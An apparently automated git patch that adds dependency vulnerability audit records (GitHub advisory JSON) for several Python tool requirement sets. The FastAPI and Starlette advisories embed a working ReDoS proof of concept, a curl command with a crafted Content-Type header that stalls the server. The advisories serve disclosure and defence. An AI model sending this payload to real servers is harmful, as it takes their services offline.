From 1110a586c46a4e0e37af5cdcd95142475abe3681 Mon Sep 17 00:00:00 2001 From: "github.actions" Date: Tue, 6 Feb 2024 08:04:58 +0000 Subject: [PATCH] Latest data: Tue Feb 6 08:04:58 UTC 2024 --- audits/awscli-requirements.audit.json | 205 ++++++ audits/azure-cli-requirements.audit.json | 221 ++++++ audits/dnsviz-requirements.audit.json | 148 ++++ audits/dstack-requirements.audit.json | 524 +++++++++++++ audits/fdroidserver-requirements.audit.json | 123 +--- audits/flintrock-requirements.audit.json | 123 +--- audits/platformio-requirements.audit.json | 239 ++++++ audits/schemathesis-requirements.audit.json | 239 ++++++ audits/ssh-mitm-requirements.audit.json | 123 +--- audits/theharvester-requirements.audit.json | 769 +++++++++----------- requirements/awslogs-requirements.txt | 8 +- requirements/azure-cli-requirements.txt | 19 +- requirements/conda-lock-requirements.txt | 12 +- requirements/dolphie-requirements.txt | 4 +- requirements/dxpy-requirements.txt | 2 +- requirements/jupyterlab-requirements.txt | 3 + requirements/linode-cli-requirements.txt | 4 +- requirements/theharvester-requirements.txt | 28 +- requirements/vpn-slice-requirements.txt | 2 +- 19 files changed, 1999 insertions(+), 797 deletions(-) create mode 100644 audits/azure-cli-requirements.audit.json create mode 100644 audits/dnsviz-requirements.audit.json create mode 100644 audits/platformio-requirements.audit.json create mode 100644 audits/schemathesis-requirements.audit.json diff --git a/audits/awscli-requirements.audit.json b/audits/awscli-requirements.audit.json index 41b31899..079db625 100644 --- a/audits/awscli-requirements.audit.json +++ b/audits/awscli-requirements.audit.json @@ -9,6 +9,202 @@ "awscli-requirements" ], "vulnerabilities": [ + { + "modified": "2024-02-05T23:28:34Z", + "published": "2024-02-05T21:30:31Z", + "schema_version": "1.6.0", + "id": "GHSA-3ww4-gg4f-jr7f", + "aliases": [ + "CVE-2023-50782" + ], + "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack", + "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "cryptography", + "purl": "pkg:pypi/cryptography" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "42.0.0" + } + ] + } + ], + "versions": [ + "0.1", + "0.2", + "0.2.1", + "0.2.2", + "0.3", + "0.4", + "0.5", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.6", + "0.6.1", + "0.7", + "0.7.1", + "0.7.2", + "0.8", + "0.8.1", + "0.8.2", + "0.9", + "0.9.1", + "0.9.2", + "0.9.3", + "1.0", + "1.0.1", + "1.0.2", + "1.1", + "1.1.1", + "1.1.2", + "1.2", + "1.2.1", + "1.2.2", + "1.2.3", + "1.3", + "1.3.1", + "1.3.2", + "1.3.3", + "1.3.4", + "1.4", + "1.5", + "1.5.1", + "1.5.2", + "1.5.3", + "1.6", + "1.7", + "1.7.1", + "1.7.2", + "1.8", + "1.8.1", + "1.8.2", + "1.9", + "2.0", + "2.0.1", + "2.0.2", + "2.0.3", + "2.1", + "2.1.1", + "2.1.2", + "2.1.3", + "2.1.4", + "2.2", + "2.2.1", + "2.2.2", + "2.3", + "2.3.1", + "2.4", + "2.4.1", + "2.4.2", + "2.5", + "2.6", + "2.6.1", + "2.7", + "2.8", + "2.9", + "2.9.1", + "2.9.2", + "3.0", + "3.1", + "3.1.1", + "3.2", + "3.2.1", + "3.3", + "3.3.1", + "3.3.2", + "3.4", + "3.4.1", + "3.4.2", + "3.4.3", + "3.4.4", + "3.4.5", + "3.4.6", + "3.4.7", + "3.4.8", + "35.0.0", + "36.0.0", + "36.0.1", + "36.0.2", + "37.0.0", + "37.0.1", + "37.0.2", + "37.0.3", + "37.0.4", + "38.0.0", + "38.0.1", + "38.0.2", + "38.0.3", + "38.0.4", + "39.0.0", + "39.0.1", + "39.0.2", + "40.0.0", + "40.0.1", + "40.0.2", + "41.0.0", + "41.0.1", + "41.0.2", + "41.0.3", + "41.0.4", + "41.0.5", + "41.0.6", + "41.0.7" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://github.com/pyca/cryptography/issues/9785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyca/cryptography" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:04:50Z", + "nvd_published_at": "2024-02-05T21:15:11Z", + "severity": "MODERATE" + } + }, { "modified": "2023-11-09T05:40:01Z", "published": "2023-07-14T21:31:08Z", @@ -304,6 +500,15 @@ } ], "groups": [ + { + "ids": [ + "GHSA-3ww4-gg4f-jr7f" + ], + "aliases": [ + "CVE-2023-50782", + "GHSA-3ww4-gg4f-jr7f" + ] + }, { "ids": [ "GHSA-cf7p-gm2m-833m", diff --git a/audits/azure-cli-requirements.audit.json b/audits/azure-cli-requirements.audit.json new file mode 100644 index 00000000..09366026 --- /dev/null +++ b/audits/azure-cli-requirements.audit.json @@ -0,0 +1,221 @@ +[ + { + "package": { + "name": "cryptography", + "version": "41.0.6", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "azure-cli-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T23:28:34Z", + "published": "2024-02-05T21:30:31Z", + "schema_version": "1.6.0", + "id": "GHSA-3ww4-gg4f-jr7f", + "aliases": [ + "CVE-2023-50782" + ], + "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack", + "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "cryptography", + "purl": "pkg:pypi/cryptography" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "42.0.0" + } + ] + } + ], + "versions": [ + "0.1", + "0.2", + "0.2.1", + "0.2.2", + "0.3", + "0.4", + "0.5", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.6", + "0.6.1", + "0.7", + "0.7.1", + "0.7.2", + "0.8", + "0.8.1", + "0.8.2", + "0.9", + "0.9.1", + "0.9.2", + "0.9.3", + "1.0", + "1.0.1", + "1.0.2", + "1.1", + "1.1.1", + "1.1.2", + "1.2", + "1.2.1", + "1.2.2", + "1.2.3", + "1.3", + "1.3.1", + "1.3.2", + "1.3.3", + "1.3.4", + "1.4", + "1.5", + "1.5.1", + "1.5.2", + "1.5.3", + "1.6", + "1.7", + "1.7.1", + "1.7.2", + "1.8", + "1.8.1", + "1.8.2", + "1.9", + "2.0", + "2.0.1", + "2.0.2", + "2.0.3", + "2.1", + "2.1.1", + "2.1.2", + "2.1.3", + "2.1.4", + "2.2", + "2.2.1", + "2.2.2", + "2.3", + "2.3.1", + "2.4", + "2.4.1", + "2.4.2", + "2.5", + "2.6", + "2.6.1", + "2.7", + "2.8", + "2.9", + "2.9.1", + "2.9.2", + "3.0", + "3.1", + "3.1.1", + "3.2", + "3.2.1", + "3.3", + "3.3.1", + "3.3.2", + "3.4", + "3.4.1", + "3.4.2", + "3.4.3", + "3.4.4", + "3.4.5", + "3.4.6", + "3.4.7", + "3.4.8", + "35.0.0", + "36.0.0", + "36.0.1", + "36.0.2", + "37.0.0", + "37.0.1", + "37.0.2", + "37.0.3", + "37.0.4", + "38.0.0", + "38.0.1", + "38.0.2", + "38.0.3", + "38.0.4", + "39.0.0", + "39.0.1", + "39.0.2", + "40.0.0", + "40.0.1", + "40.0.2", + "41.0.0", + "41.0.1", + "41.0.2", + "41.0.3", + "41.0.4", + "41.0.5", + "41.0.6", + "41.0.7" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-3ww4-gg4f-jr7f/GHSA-3ww4-gg4f-jr7f.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://github.com/pyca/cryptography/issues/9785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50782" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pyca/cryptography" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T23:04:50Z", + "nvd_published_at": "2024-02-05T21:15:11Z", + "severity": "MODERATE" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-3ww4-gg4f-jr7f" + ], + "aliases": [ + "CVE-2023-50782", + "GHSA-3ww4-gg4f-jr7f" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/dnsviz-requirements.audit.json b/audits/dnsviz-requirements.audit.json new file mode 100644 index 00000000..817bb206 --- /dev/null +++ b/audits/dnsviz-requirements.audit.json @@ -0,0 +1,148 @@ +[ + { + "package": { + "name": "m2crypto", + "version": "0.39.0", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dnsviz-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T22:56:53Z", + "published": "2024-02-05T21:30:31Z", + "schema_version": "1.6.0", + "id": "GHSA-944j-8ch6-rf6x", + "aliases": [ + "CVE-2023-50781" + ], + "summary": "m2crypto Bleichenbacher timing attack - incomplete fix for CVE-2020-25657", + "details": "A flaw was found in m2crypto. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "m2crypto", + "purl": "pkg:pypi/m2crypto" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.40.1" + } + ] + } + ], + "versions": [ + "0.11", + "0.13", + "0.15", + "0.16", + "0.17", + "0.18", + "0.18.1", + "0.18.2", + "0.19", + "0.19.1", + "0.20", + "0.20.1", + "0.20.2", + "0.20beta1", + "0.21", + "0.21.1", + "0.22.3", + "0.22.4", + "0.22.5", + "0.23.0", + "0.24.0", + "0.25.0", + "0.25.1", + "0.26.0", + "0.26.2", + "0.26.3", + "0.26.4", + "0.27.0", + "0.28.0", + "0.28.1", + "0.28.2", + "0.29.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.35.2", + "0.36.0", + "0.37.0", + "0.37.1", + "0.38.0", + "0.39.0", + "0.40.0", + "0.40.1" + ], + "database_specific": { + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-944j-8ch6-rf6x/GHSA-944j-8ch6-rf6x.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-50781" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254426" + }, + { + "type": "PACKAGE", + "url": "https://gitlab.com/m2crypto/m2crypto" + }, + { + "type": "WEB", + "url": "https://gitlab.com/m2crypto/m2crypto/-/issues/342" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-208" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T22:41:57Z", + "nvd_published_at": "2024-02-05T21:15:10Z", + "severity": "MODERATE" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-944j-8ch6-rf6x" + ], + "aliases": [ + "CVE-2023-50781", + "GHSA-944j-8ch6-rf6x" + ] + } + ] + } +] \ No newline at end of file diff --git a/audits/dstack-requirements.audit.json b/audits/dstack-requirements.audit.json index 9242217c..1b91643a 100644 --- a/audits/dstack-requirements.audit.json +++ b/audits/dstack-requirements.audit.json @@ -1,4 +1,291 @@ [ + { + "package": { + "name": "fastapi", + "version": "0.109.0", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dstack-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:28:33Z", + "published": "2024-02-05T17:01:54Z", + "schema_version": "1.6.0", + "id": "GHSA-qf9m-vfgh-m389", + "aliases": [ + "CVE-2024-24762" + ], + "summary": "FastAPI Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\nThis is also reported to Starlette at: https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238\n\n### PoC\n\nCreate a FastAPI app that uses form data:\n\n```Python\n# main.py\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "fastapi", + "purl": "pkg:pypi/fastapi" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.109.1" + } + ] + } + ], + "versions": [ + "0.1.0", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.18", + "0.1.19", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", + "0.10.0", + "0.10.1", + "0.10.2", + "0.100.0", + "0.100.0b1", + "0.100.0b2", + "0.100.0b3", + "0.100.1", + "0.101.0", + "0.101.1", + "0.102.0", + "0.103.0", + "0.103.1", + "0.103.2", + "0.104.0", + "0.104.1", + "0.105.0", + "0.106.0", + "0.107.0", + "0.108.0", + "0.109.0", + "0.11.0", + "0.12.0", + "0.12.1", + "0.13.0", + "0.14.0", + "0.15.0", + "0.16.0", + "0.17.0", + "0.18.0", + "0.19.0", + "0.2.0", + "0.2.1", + "0.20.0", + "0.20.1", + "0.21.0", + "0.22.0", + "0.23.0", + "0.24.0", + "0.25.0", + "0.26.0", + "0.27.0", + "0.27.1", + "0.27.2", + "0.28.0", + "0.29.0", + "0.29.1", + "0.3.0", + "0.30.0", + "0.30.1", + "0.31.0", + "0.32.0", + "0.33.0", + "0.34.0", + "0.35.0", + "0.36.0", + "0.37.0", + "0.38.0", + "0.38.1", + "0.39.0", + "0.4.0", + "0.40.0", + "0.41.0", + "0.42.0", + "0.43.0", + "0.44.0", + "0.44.1", + "0.45.0", + "0.46.0", + "0.47.0", + "0.47.1", + "0.48.0", + "0.49.0", + "0.49.1", + "0.49.2", + "0.5.0", + "0.5.1", + "0.50.0", + "0.51.0", + "0.52.0", + "0.53.0", + "0.53.1", + "0.53.2", + "0.54.0", + "0.54.1", + "0.54.2", + "0.55.0", + "0.55.1", + "0.56.0", + "0.56.1", + "0.57.0", + "0.58.0", + "0.58.1", + "0.59.0", + "0.6.0", + "0.6.1", + "0.6.2", + "0.6.3", + "0.6.4", + "0.60.0", + "0.60.1", + "0.60.2", + "0.61.0", + "0.61.1", + "0.61.2", + "0.62.0", + "0.63.0", + "0.64.0", + "0.65.0", + "0.65.1", + "0.65.2", + "0.65.3", + "0.66.0", + "0.66.1", + "0.67.0", + "0.68.0", + "0.68.1", + "0.68.2", + "0.69.0", + "0.7.0", + "0.7.1", + "0.70.0", + "0.70.1", + "0.71.0", + "0.72.0", + "0.73.0", + "0.74.0", + "0.74.1", + "0.75.0", + "0.75.1", + "0.75.2", + "0.76.0", + "0.77.0", + "0.77.1", + "0.78.0", + "0.79.0", + "0.79.1", + "0.8.0", + "0.80.0", + "0.81.0", + "0.82.0", + "0.83.0", + "0.84.0", + "0.85.0", + "0.85.1", + "0.85.2", + "0.86.0", + "0.87.0", + "0.88.0", + "0.89.0", + "0.89.1", + "0.9.0", + "0.9.1", + "0.90.0", + "0.90.1", + "0.91.0", + "0.92.0", + "0.93.0", + "0.94.0", + "0.94.1", + "0.95.0", + "0.95.1", + "0.95.2", + "0.96.0", + "0.96.1", + "0.97.0", + "0.98.0", + "0.99.0", + "0.99.1" + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.109.0", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-qf9m-vfgh-m389/GHSA-qf9m-vfgh-m389.json" + } + } + ], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24762" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tiangolo/fastapi" + }, + { + "type": "WEB", + "url": "https://github.com/tiangolo/fastapi/releases/tag/0.109.1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:01:54Z", + "nvd_published_at": "2024-02-05T15:15:09Z", + "severity": "HIGH" + } + } + ], + "groups": [ + { + "ids": [ + "GHSA-qf9m-vfgh-m389" + ], + "aliases": [ + "CVE-2024-24762", + "GHSA-qf9m-vfgh-m389" + ] + } + ] + }, { "package": { "name": "git-url-parse", @@ -111,5 +398,242 @@ ] } ] + }, + { + "package": { + "name": "starlette", + "version": "0.35.1", + "ecosystem": "PyPI" + }, + "dependency_groups": [ + "dstack-requirements" + ], + "vulnerabilities": [ + { + "modified": "2024-02-05T17:18:11Z", + "published": "2024-02-05T17:01:19Z", + "schema_version": "1.6.0", + "id": "GHSA-93gm-qmq6-w238", + "summary": "Starlette Content-Type Header ReDoS", + "details": "### Summary\n\nWhen using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options.\n\nAn attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests.\n\nThis can create a ReDoS (Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep 